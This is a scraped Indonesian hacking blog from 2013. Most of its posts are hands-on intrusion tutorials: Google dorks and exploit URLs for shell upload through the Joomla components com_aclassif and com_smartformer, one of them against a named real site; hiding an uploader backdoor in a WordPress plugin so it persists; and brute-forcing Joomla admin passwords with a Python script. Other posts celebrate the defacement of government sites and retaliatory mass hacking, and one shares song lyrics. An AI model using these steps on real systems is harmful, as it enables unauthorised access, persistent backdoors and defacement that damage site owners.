This is featured post 1 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

This is featured post 2 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

This is featured post 3 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

This is featured post 4 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

Rabu, 31 Juli 2013

Exploit Joomla Component com_aclassif shell upload Vulnerability

Posted by Erza Jullian 14.46, under | No comments

Ini exploit lama sih. tapi baru nemu tadi di grup. Yaudah sekalian share di blog. Mungkin berguna buat newbie seperti saya . =)).

Oke, langsung saja.

Bahan :

1. backdoor shell, file .html / .txt

2. dork : inurl:"index.php?option=com_aclassif"

3. Exploit : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Langsung saja kita cari target di google dengan dork diatas.


Sebagai contoh, saya dapet target http://www.stabledock.com/

masukkan exploitnya menjadi : http://www.stabledock.com/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1



Tinggal isi data datanya. Boleh ngasal kok. Terakhir, upload filenya di attachment .

NB : beberapa situs memungkinkan kita untuk upload file .php dan .html , namun ada juga yang hanya bisa upload .txt seperti situs diatas.





Jika sudah, tinggal klik link yang ada di keterangan seperti gambar diatas.

http://www.stabledock.com/components/com_aclassif/photos/mtmd23.txt





Sekian tutorial kali ini. Semoga bermanfaat.

Selasa, 30 Juli 2013

Terlalu Sombong, Website Bareskrim Polri Diretas

Posted by Erza Jullian 22.12, under , | No comments

Kejadiannya sekitar setengah jam yang lalu. Waktu saya masih di sekolah. Sampai dirumah, langsung share di blog. =)) . Ya, web Bareskrim Polri (http://bareskrim.polri.go.id/) yang dianggap tidak mungkin dibobol hacker, ternyata tembus. Dari berita yang pernah dipublish inilah.com, Kabareskrim dengan congkaknya menyebut bahwa hacker tidak mungkin menyerang situs bareskrim. "INILAH.COM, Jakarta - Kepala Badan Reserse Kriminal (Kabareskrim) Mabes Polri Komjen Pol Sutarman mengklaim Bareskrim Polri tidak gentar kepada para hacker (peretas) karena pihaknya percaya diri telah memiliki sistem keamanan yang kuat."

Tapi yah, kesempurnaan hanya milik Allah pak =)) . Jangan terlalu sombong. There is no perfect system. Lagipula, tidak ada "rumah" yang tidak ber"pintu" .




hacked

Defacer dengan nick "Pra5astea'" tersebut meninggalkan pesan berikut :



"LIHATLAH MERAH PUTIH INI, BERTAHTAKAN GARUDA YANG SEMPURNA"



"MENGARTIKAN BERANI, SUCI HATI DAN JIWA"



"MELAMBANGKAN BESAAAARRRR, GAGAH, DAN PERKASA"



"YA !!! INILAH BENDERA DAN LAMBANG NEGARAKU YANG INDAH NAN DIAGUNGKAN"



"TAPI KINI DIA SEDANG MENANGIS, MEMBAYANGKAN KAPAN "BERAKHIRNYA" KEBOBROKAN INI"



"DEMI TUHAN, DOA(NYA) YANG SELALU BERGEMA DEMI UMAT MANUSIA DI INDONESIA"



"HENTIKANLAH WAHAI TUAN, MUSNAHKAN KETIDAKSEIMBANGAN INI, HILANGKANLAH KEBIASAAN-KEBIASAAN YANG AKAN MEMBUAT KERUGIAN, SIRNAKAN :'("



"BERPIHAKLAH PADA RAKYAT DAN NEGARA, DEMI IBU PERTIWI TERCINTA, KEMBALI KITA TERBANGKAN BERSAMA"



Untuk Mirror nya, silahkan lihat di : Zone-H Mirror





There is no perfect system :)

Exploit Joomla Component com_smartformer Shell Upload Vulnerability

Posted by Erza Jullian 15.50, under | No comments

Sebenarnya ini Exploit lama sih. Tapi ternyata amsih ada web yang vuln dengan cara ini. jadi tidak ada salahnya saya juga ikut share. =))

Oke, langsung saja dimulai .

Bahan-bahan :

- shell php, script html

- dork : inurl:"index.php?option=com_smartformer" <--- kalo pengen dapet hasil lebih, kembangkan sendiri dorknya :)

Langsung saja kita berselancar di google mencari target. Harus sabar. tidak semua situs vuln dengan exploit ini.

lalu pilih salah satu situs.

maka kalian akan menemukan form seperti dibawah ini :



Langsung saja isi datanya. Lalu submit masukkan shellnya di "pilih berkas" . Terserah mau langsung script html apa backdoor .php .

Jika sudah, shell akan terletak di http://target.com/components/com_smartformer/files/namashell.php

Jika hanya upload html, ya tinggal lihat hasilnya :





Sekian tutorial kali ini, jadikan sebagai pembelajaran saja =))



./Akicha

Cyber War Indonesian Hacker vs Bangladesh Grey Hat Hacker

Posted by Erza Jullian 05.21, under ,, | No comments

Saya sendiri awalnya tidak tahu penyebab dari perang dunia maya ini. Tapi setelah ditelusuri, BDGH memfitnah Indonesia dengan menyebut Indonesia sebagai pendukung Israel. Pesan yang disampaikan oleh salah satu admin BDGH adalah : Stop supporing Israel or else we will make you life hell...Be Human..Stop supporting Israel....

� BD GREY HAT HACKERS

Ini jelas fitnah karena jelas-jelas kita juga berpartisipasi dalam OpIsrael.



Telah diupayakan perundingan namun sepertinya mereka menolak damai. Bahkan tidak tanggung tanggung, puluhan situs go.id tumbang dalam sehari.

Ini jelas tidak bisa dibiarkan. Para aktivis Underground Indonesia (saya tidak mau menyebut hacker) pun bahu membahu untuk melancarkan serangan balasan ke situs Bangladesh.

hasilnya, setidaknya sampai saat ini 450+ situs Bangladesh berhasil diperawani =))



FVCK BD GAY HAT U R LAMER



Sekian dan semoga war ini segera berakhir. Mengingat kita juga sama-sama negara muslim.



./Akicha

Senin, 29 Juli 2013

Cara Mudah Upload Shell Via Wordpress Plugins

Posted by Erza Jullian 15.28, under | No comments

Kali ini saya akan share tutorial mudah untuk mengupload backdoor lewat pligins wordpress. Biasanya, kita lebih suka mengupload shell lewat edit theme. Namun kadang backdoor juga cepat hilang jika webmasternya segera menginstall ulang tema. Hal ini yang kadang tidak dilakukan di plugins. Sehingga backdoor kita tetap awet. =))

Oke, pertama, saya sumsikan sobat sudah amsuk ke dashboard WPnya. Terserah mau pake teknik apa. :)

lalu klik Plugins





Atau untuk lebih cepat, klik www.site.com/wp-admin/plugin-editor.php

Lalu pilih salah satu plugins yang akan diedit.

Setelah itu, masukkan script uploader berikut :





Untuk lebih jelasnya, lihat SS :



lalu, update file.

Sekarang cara mengaksesnya adalah :

www.situs.com/wp-content/plugins/namapugins/namaplugis.php



Karena saya tadi mengedit plugins wp-cumulus , maka menjadi :

http://pascalmore.me/wp-content/plugins/wp-cumulus/wp-cumulus.php



Sip, ada uploader disana. Sekarang kiat upload shell kita =))

Letak shell ada di /wp-content/plugins/namaplugins/namashell.php



Sekarang terserah mau diapain. mau dideface silahkan. Mau diobrak abrik silahkan. :v



Sekian tutorial kali ini, semoga bermanfaat =))



Refrensi

Minggu, 28 Juli 2013

Download Lagu JKT48 - JKT Shanjou | Clean Version

Posted by Erza Jullian 17.08, under , | No comments

Kali ini saya akan share lagu JKT Shanjou yang clean version. memang banyak sih bertebaran link download JKT Shanjou di google. tapi hampir 20x download, ngetroll semua. isinya chant semua. Untung ketemu juga yang Clean Version. Makanya langsung saya share di blog . =)) .

Oke, kali aja ada yang belum tau liriknya :

Lirik Lagu JKT48 - JKT Shanjou



Hidupku tuk Bisa terus berdiri

Mempertahankan sahabat

Melihat mimpi

Sepertinya

Akan terlihat



Melakukan apa saja

Tak pernah aku apapun tertiup angin

Ingin menjadi pasir

Tidak melupakan air mata yang mengalir

Hari tak bersemangat



Entah darimana itu balasan

Yang seakan terus berfikir

Suaranya pun juga terdengar teriakan

Yang mengetuk

Mengetuk pintu hati



We Are JKT,

Semangat maakusu

Yang dahulu pernah hilang

Oh! Emotion kuingatlah



Ayo pergi

We Are JKT,

Semangat maakusu

Berlari di sekujur tubuh

Aliran darah panas ini

Ayolah dobrak masa depan



Waktu ku kecil

Daripada di kejar,

Akulah yang mengejar

Entah sejak kapan

Ku berhenti berlari

Hanya berjalan saja



Apabila hal baik

Tak ada satu pun,

Untuk melihat ke bawah

Yang sudah lelah untuk mempercayainya



Saat ini berdiri

Bagaikan ingin memandang sesuatu

Merasakan detak jantung

Mencari siapa yang

Kesulitan



Tiba untuk berjuang

We are JKT

Kesatuan Fourty Eight

Ayo kembali pasang

Mimpi yang dahulu pernah hilang!



Yosshaaa

We are JKT

Kesatuan Fourty Eight

Yang berkilauan

Bukanlah keringat yang jatuh ke kaki

Ada jiwa yang membara



Ayo terus berlari!

We are JKT

Semangat maakusu

Yang dahulu pernah hilang

Oh! Emotion kuingatlah



Ayo pergi!

We are JKT

Semangat maakusu

Berlari di sekujur tubuh

Aliran darah panas ini

Ayolah dobrak masa depan!



Ini Link Downloadnya :

Download JKT48 - JKT Shanjou Clean Version



Sekian dan semoga bermanfaat



./Akicha | We Love JKT48

Kamis, 25 Juli 2013

Brute Force Joomla Dengan Python

Posted by Erza Jullian 15.07, under | No comments

Kali ini saya akan share tutorial ngan metode bruteforce. Tapi kali ini yang digunakan adalah Phyton. Tutorial yang saya share disini saya test emnggunakan Windows. Mungkin kalau anda pemakai backtrack tidak akan serumit ini.

Oke, pertama download python disini : Python

Lalu download joomla.py di sini : Download

lalu wordlistnya disini : Download 1 | Download 2





Pertama, kita harus buka CMD

Start - Run - CMD - Enter



Karena saya meletakkan joomla.py di C:\brute\brute, jadi harus cd\ �klik enter� .

Lalu cd brute\brute �klik enter� .

Lalu ketik joomla.py .





Lalu masukan Command

joomla.py -h http://namaweb.com/administrator/ -u admin -P wordlist.txt



Bruteforce membutuhkan kesabaran. Tunggu saja sampai proses finding password selesai. Dan lihat, kita mendapatkan passwordnya :



Sekarang, coba login dengan password yang didapat =))




Last Step

Gotcha !!Sudah masuk. Sekarang terserah ada mau diapain .

Sekian dan semoga bermanfaat =))



Refrensi

Tags

Blog Archive

Blog Archive